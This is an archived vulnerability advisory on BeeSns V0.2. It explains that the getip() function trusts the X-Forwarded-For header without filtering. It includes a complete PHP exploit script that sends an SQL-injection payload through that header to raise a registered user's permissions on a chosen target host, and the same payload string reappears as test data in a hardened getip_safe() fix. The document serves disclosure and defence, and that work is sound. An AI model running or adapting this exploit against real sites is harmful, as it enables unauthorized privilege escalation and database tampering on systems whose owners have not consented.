BeeSns microblogging system V0.2 privilege escalation 0day + exp and fix - vulnerability warning - Black Bar Safety Net

2011-02-04T00:00:00
ID MYHACK58:62201128987
Type myhack58
Reporter Anonymous
Modified 2011-02-04T00:00:00

Description


Publishing author: sub-meter
Affected version: BeeSns V0.2
Official site: <http://www.beesns.com/>
Vulnerability description: the client IP is not filtered strictly, so a user can submit a malicious value and elevate their own privileges.

This microblogging system has a nice style and I personally like it, but looking at the code I found some problems. Let's go straight to the code.

```php
// Get client IP
function getip() {
    if (isset($_SERVER)) {
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
            $realip = $_SERVER['HTTP_CLIENT_IP'];
        } else {
            $realip = $_SERVER['REMOTE_ADDR'];
        }
    } else {
        if (getenv("HTTP_X_FORWARDED_FOR")) {
            $realip = getenv("HTTP_X_FORWARDED_FOR");
        } elseif (getenv("HTTP_CLIENT_IP")) {
            $realip = getenv("HTTP_CLIENT_IP");
        } else {
            $realip = getenv("REMOTE_ADDR");
        }
    }
    $iphide = explode(".", $realip);

    $realip = "$iphide[0].$iphide[1].$iphide[2].$iphide[3]"; //! I have no idea what the author was trying to do here; the IP is not filtered at all, and this is where the vulnerability comes from
    return $realip;
}
```

An old type of vulnerability; this is just for fun. - -!

EXP:

```php
<?php
print_r('
+---------------------------------------------------------------------------+<br>
BeeSns v0.2 Getip() Remote SQL Injection Exploit<br>
site:www.beesns.com <br>
by sub-meter<br>
Blog: http://www.zyday.com <br>

+---------------------------------------------------------------------------+<br>');

if (empty($_POST['submit'])) {
} else {
    error_reporting(7);
    ini_set('max_execution_time', 0);
    $host     = $_POST['host'];
    $path     = $_POST['path'];
    $username = $_POST['username'];
    $password = $_POST['password'];
    send();
}

function send()
{
    global $host, $path, $username, $password;

    $cmd    = "uId=" . $username . "&uPw=" . $password;
    $getinj = "1.1.1.1',permissions=5 where uid='$username'#";
    $data  = "POST " . $path . "post.php?act='userLogin' HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: " . strlen($cmd) . "\r\n";
    $data .= "Connection: Close\r\n";
    $data .= "X-Forwarded-For: $getinj\r\n\r\n";
    $data .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    if (preg_match('#(.*)charset=utf-8(.*)1(.*)1(.*)0(.*)#Uis', $resp)) {
        echo "<br><font color='green'>Elevation succeeded!</font>";
    } else {
        echo "<font color='red'>Failed!</font>";
    }

}
?>
<form action="" method="POST">
Target address:<input type='input' name='host' value='www.zyday.com'>*do not add http://<br>
Subdirectory:<input type='input' name='path' value='/'>*if there is no subdirectory, keep the default<br>
Username:<input type='input' name='username'>*the username you registered on the target site<font color='red'>testing with a throwaway account is suggested</font><br>
Password:<input type='input' name='password'><br>
<input type='submit' name='submit' value='Elevate privileges'><br>
</form>
```

Fix: filter the IP, i.e. validate the value taken from the request headers before it is used.
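As an added example (not BeeSns's own code), a hardened replacement for getip(): it honours X-Forwarded-For / Client-IP only when the direct peer is a trusted proxy (the address list is an assumption) and only accepts a value that filter_var() validates as an IP, otherwise falling back to REMOTE_ADDR. The original's explode()/rejoin step preserves any text after the third dot, which is why the payload above is shaped like an IP; proper validation rejects it.

```php
<?php
// Added example, not BeeSns code: hardened replacement for getip().
// Assumption: TRUSTED_PROXIES lists the reverse proxies in front of the app.
const TRUSTED_PROXIES = ['10.0.0.1'];

function getip_safe(array $server): string
{
    // REMOTE_ADDR comes from the TCP connection and cannot be set by a client header.
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (!in_array($remote, TRUSTED_PROXIES, true)) {
        return $remote;  // direct connection: forwarded headers are untrusted text
    }
    // Behind a trusted proxy: take the first hop and accept it only if it parses as an IP.
    foreach (['HTTP_X_FORWARDED_FOR', 'HTTP_CLIENT_IP'] as $hdr) {
        if (empty($server[$hdr])) {
            continue;
        }
        $candidate = trim(explode(',', $server[$hdr])[0]);
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            return $candidate;
        }
    }
    return $remote;  // header present but not a valid IP: ignore it
}

// Constructed requests (not real traffic) carrying the advisory's injection string.
$payload = "1.1.1.1',permissions=5 where uid='test'#";

// Direct client: header is ignored entirely.
$direct = ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_X_FORWARDED_FOR' => $payload];
var_dump(getip_safe($direct));

// Via trusted proxy, but the forwarded value is not an IP: rejected.
$viaProxyBad = ['REMOTE_ADDR' => '10.0.0.1', 'HTTP_X_FORWARDED_FOR' => $payload];
var_dump(getip_safe($viaProxyBad));

// Via trusted proxy with a well-formed chain: first hop is returned.
$viaProxyOk = ['REMOTE_ADDR' => '10.0.0.1', 'HTTP_X_FORWARDED_FOR' => '198.51.100.9, 10.0.0.1'];
var_dump(getip_safe($viaProxyOk));

// Even a validated IP must still be bound as a query parameter when it is
// written to the users table; validation reduces the attack surface, it does
// not replace prepared statements.
```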